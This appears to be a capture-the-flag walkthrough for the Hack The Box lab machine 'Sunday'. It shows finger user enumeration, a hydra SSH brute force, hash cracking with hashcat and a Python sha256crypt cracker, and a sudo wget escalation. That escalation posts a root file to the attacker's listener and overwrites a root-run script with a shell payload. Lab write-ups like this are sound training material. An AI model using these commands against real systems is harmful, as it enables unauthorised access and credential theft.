[HTB Notes] Sunday

1. Check open ports
nmap --min-rate 1000 -p- -v 10.10.10.76
# 79/tcp    open  finger
# 111/tcp   open  rpcbind
# 22022/tcp open  unknown
nmap -oN sunday.nmap -p79,111,22022 -sC -sV -v 10.10.10.76
# 79/tcp    open  finger  Sun Solaris fingerd
# | finger: 
# | Login    Name      TTY       Idle    When       Where
# | sunny    sunny     pts/2     13      Fri 07:17  10.10.15.75
# |_sammy    sammy     pts/3             Fri 07:30  10.10.15.75
# 111/tcp   open  rpcbind 2-4 (RPC #100000)
# 22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
# | ssh-hostkey:
# |   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
# |_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
#

2. Enumerate users via finger (port 79)
finger -l @10.10.10.76   # empty user + long format: fingerd lists everyone currently logged in
# Login name: sunny                 In real life: sunny
# Directory: /export/home/sunny     Shell: /bin/bash
# On since Oct 12 07:17:29 on pts/2 from 10.10.15.75
# 24 minutes Idle Time
# No unread mail
# No Plan.
#
# Login name: sammy                 In real life: sammy
# Directory: /export/home/sammy     Shell: /bin/bash
# On since Oct 12 07:30:08 on pts/3 from 10.10.15.75
# 5 minutes 58 seconds Idle Time
# No unread mail
# No Plan.
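The finger step above is a one-line request on TCP 79 (RFC 1288: an optional "/W" for long format, an optional username, then CRLF). As an added example, not part of the original notes, here is a minimal client plus a parser for the Solaris long-format reply, exercised against a constructed copy of the reply shown above. The client function assumes a reachable fingerd and is not exercised offline; the "Login name:" / "Directory:" / "On since ... from" field layout is the Solaris format from this box, other fingerd implementations use different labels.

```python
import socket

# Constructed sample: the long-format reply Solaris fingerd returned above,
# minus the "# " prefix used for output in these notes.
SAMPLE_REPLY = """\
Login name: sunny                 In real life: sunny
Directory: /export/home/sunny     Shell: /bin/bash
On since Oct 12 07:17:29 on pts/2 from 10.10.15.75
24 minutes Idle Time
No unread mail
No Plan.

Login name: sammy                 In real life: sammy
Directory: /export/home/sammy     Shell: /bin/bash
On since Oct 12 07:30:08 on pts/3 from 10.10.15.75
5 minutes 58 seconds Idle Time
No unread mail
No Plan.
"""


def finger_query(host, user="", verbose=True, port=79, timeout=5):
    """Send one RFC 1288 request and return the raw reply as text.

    verbose=True with an empty user is what `finger -l @host` sends ("/W\\r\\n").
    Network access is assumed; this helper is not run by the offline checks.
    """
    request = ("/W " if verbose else "") + user + "\r\n"
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("ascii"))
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", errors="replace")


def parse_finger_reply(text):
    """Parse a Solaris long-format reply into {login: {name, home, shell, from}}."""
    users = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Login name:"):
            login, _, real = line[len("Login name:"):].partition("In real life:")
            current = {"login": login.strip(), "name": real.strip(),
                       "home": None, "shell": None, "from": None}
            users[current["login"]] = current
        elif current is None:
            continue  # header or noise before the first user block
        elif line.startswith("Directory:"):
            home, _, shell = line[len("Directory:"):].partition("Shell:")
            current["home"] = home.strip()
            current["shell"] = shell.strip()
        elif line.startswith("On since") and " from " in line:
            # origin of the session: useful for spotting other testers / admins
            current["from"] = line.rsplit(" from ", 1)[1].strip()
    return users


def valid_logins(text):
    """Sorted list of logins found in a reply; feed these to hydra/ssh."""
    return sorted(parse_finger_reply(text))


if __name__ == "__main__":
    for login, info in parse_finger_reply(SAMPLE_REPLY).items():
        print(login, info["home"], info["shell"], info["from"])
```

With a real target, `finger_query("10.10.10.76")` returns the same shape of text, and `finger_query("10.10.10.76", "sunny")` narrows it to one account; a reply that contains no "Login name:" block means no match on this fingerd format.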

3. Get a shell as user (sunny)
[x] Brute-force sunny's SSH password with hydra (usernames come from the finger output)
hydra -P /usr/share/wordlists/rockyou.txt -l sunny -s 22022 10.10.10.76 -t 8 ssh
# [22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
[x] Login as sunny via SSH
ssh -l sunny -p 22022 10.10.10.76
# no matching key exchange method found.
# Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
#
# SunSSH 1.3 only offers SHA-1 based key exchange, which current OpenSSH clients disable by default;
# re-enable one of the offered methods for this connection only:
ssh -l sunny -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 10.10.10.76
# Password: sunday
[x] While inside shell:
ls -la /
# drwxr-xr-x  2 root root   4 2018-04-15 20:44 backup
#
ls -la /backup
# -rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup
#
cat /backup/shadow.backup
# sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
# sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
#
sudo -l
# (root) NOPASSWD: /root/troll
#
sudo /root/troll
# testing
# uid=0(root) gid=0(root)

4. Move laterally (sunny -> sammy)
[x] Crack sammy's password hash from shadow.backup
# The "$5$" prefix already identifies the scheme: sha256crypt / SHA256(Unix), hashcat mode 7400.
# An online lookup is optional (and sends the hash to a third party):
curl --data "hashid=\$5\$Ebkn8jlK\$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB" https://hashc.co.uk/hashid | grep mode:
# [+] sha256crypt $5$, SHA256(Unix)
# (hashcat mode: 7400)
#
hashcat --force -m 7400 \$5\$Ebkn8jlK\$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB /usr/share/wordlists/rockyou.txt
# Status...........: Cracked
# Hash.Type........: sha256crypt $5$, SHA256 (Unix)
# Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
# cooldude!
[x] Login as sammy via SSH
ssh -l sammy -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 10.10.10.76
# Password: cooldude!
[x] While inside shell:
find / -name "user.txt" 2> /dev/null
# /export/home/sammy/Desktop/user.txt
#
cat /export/home/sammy/Desktop/user.txt
# a3d9498027ca5187ba1793943ee8a598
#
sudo -l
# (root) NOPASSWD: /usr/bin/wget
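Step 4 relies on two things: recognising the `$5$` prefix as sha256crypt (hashcat 7400) and guessing the password from a wordlist. As an added example, not part of the original notes and not the box's or hashcat's code, the block below re-implements sha256crypt (Ulrich Drepper's "Unix crypt using SHA-256", the same algorithm glibc and Solaris use for `$5$`) in pure Python, parses shadow-format lines, and runs a dictionary attack over a constructed five-word list standing in for rockyou.txt against a constructed copy of the two shadow.backup lines above. It also honours the optional `rounds=N$` salt parameter, which hashcat handles but the notes do not mention. Speed is irrelevant here; the point is to see what hashcat is actually computing and to have an offline check for a single hash.

```python
import hashlib
import re

# Independent re-implementation of sha256crypt ($5$) for verification purposes.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_RE = re.compile(r"^\$5\$(?:rounds=(\d+)\$)?([^$]{1,16})\$([./0-9A-Za-z]{43})$")

# Constructed copy of the two lines recovered from /backup/shadow.backup above.
SHADOW_BACKUP = """\
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "sunday", "letmein", "cooldude!", "solaris"]


def _b64_from_24bit(b2, b1, b0, n):
    """crypt(3)-style base64: emit n characters, low 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = []
    for _ in range(n):
        out.append(ITOA64[w & 0x3F])
        w >>= 6
    return "".join(out)


def sha256crypt(password, salt, rounds=5000, explicit_rounds=False):
    """Return the full "$5$[rounds=N$]salt$hash" string for password/salt."""
    pw = password.encode("utf-8")
    sl = salt.encode("ascii")[:16]               # salt is capped at 16 bytes
    b = hashlib.sha256(pw + sl + pw).digest()    # digest B = H(pw || salt || pw)
    a = hashlib.sha256(pw + sl)                  # digest A starts with pw || salt
    n = len(pw)
    while n > 32:                                # then B, repeated to len(pw) bytes
        a.update(b)
        n -= 32
    a.update(b[:n])
    n = len(pw)
    while n > 0:                                 # then B or pw per bit of len(pw)
        a.update(b if n & 1 else pw)
        n >>= 1
    a = a.digest()
    dp = hashlib.sha256(pw * len(pw)).digest()   # P: H(pw * len) stretched to len(pw)
    p = (dp * (len(pw) // 32 + 1))[:len(pw)]
    ds = hashlib.sha256(sl * (16 + a[0])).digest()  # S: H(salt * (16+A[0])) to len(salt)
    s = (ds * (len(sl) // 32 + 1))[:len(sl)]
    c = a
    for i in range(rounds):                      # mixing order depends on i parity, i%3, i%7
        h = hashlib.sha256()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(s)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    # Output bytes are interleaved in this fixed order before encoding.
    order = [(0, 10, 20), (21, 1, 11), (12, 22, 2), (3, 13, 23), (24, 4, 14),
             (15, 25, 5), (6, 16, 26), (27, 7, 17), (18, 28, 8), (9, 19, 29)]
    enc = "".join(_b64_from_24bit(c[x], c[y], c[z], 4) for x, y, z in order)
    enc += _b64_from_24bit(0, c[31], c[30], 3)
    prefix = "$5$" + (f"rounds={rounds}$" if explicit_rounds else "")
    return prefix + sl.decode("ascii") + "$" + enc


def verify(password, full_hash):
    """True if password matches a $5$ hash; refuses anything that is not sha256crypt."""
    m = HASH_RE.match(full_hash)
    if not m:
        raise ValueError("not a sha256crypt ($5$) hash")
    explicit = m.group(1) is not None
    rounds = int(m.group(1)) if explicit else 5000
    return sha256crypt(password, m.group(2), rounds, explicit) == full_hash


def parse_shadow(text):
    """Map login -> hash for every shadow-format line whose hash field is $5$."""
    entries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[1].startswith("$5$"):
            entries[fields[0]] = fields[1]
    return entries


def crack(shadow_text, wordlist):
    """Dictionary attack: first wordlist entry that verifies, per user."""
    found = {}
    for user, h in parse_shadow(shadow_text).items():
        for candidate in wordlist:
            if verify(candidate, h):
                found[user] = candidate
                break
    return found


if __name__ == "__main__":
    print(crack(SHADOW_BACKUP, WORDLIST))
```

The same `verify` call is what `hashcat -m 7400` does for every wordlist entry, 5000 SHA-256 rounds each, which is why a GPU and a good wordlist matter for real shadow files even though a handful of candidates is instant here.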

5. Privilege escalation (sunny + sammy -> root)
[x] Read /root/troll through sammy's "sudo wget": --post-file opens any file as root and sends it as the body of an HTTP POST
[x] Set up a netcat listener on the attacking machine, outside the user shell
nc -lvp 4444
# Listening on [0.0.0.0] (family 0, port 4444)
[x] Go back to user (sammy) shell
sudo wget --post-file=/root/troll HTB_IPv4:4444   # HTB_IPv4 = your own VPN address
# HTTP request sent, awaiting response...
[x] View contents of /root/troll in the netcat listener (it arrives as the POST body, after the HTTP request headers)
#!/usr/bin/bash

/usr/bin/echo "testing"
/usr/bin/id
[x] Replace /root/troll with your own payload: "sudo wget -O" writes the download as root, and sunny can run the result as root
[x] Payload, saved as "troll" in the directory the HTTP server is started from
#!/usr/bin/bash

/bin/bash
[x] Set-up HTTP Server
python -m SimpleHTTPServer
# Serving HTTP on 0.0.0.0 port 8000 ...
[x] Inside user (sammy) shell:
sudo wget http://HTB_IPv4:8000/troll -O /root/troll
[x] Straight away in user (sunny) shell (root periodically restores the original troll, so the window is short):
sudo /root/troll
[x] Inside root shell:
find / -name root.txt
# /root/root.txt
#
cat /root/root.txt
# fb40fab61d99d37536daeec0d97af9b8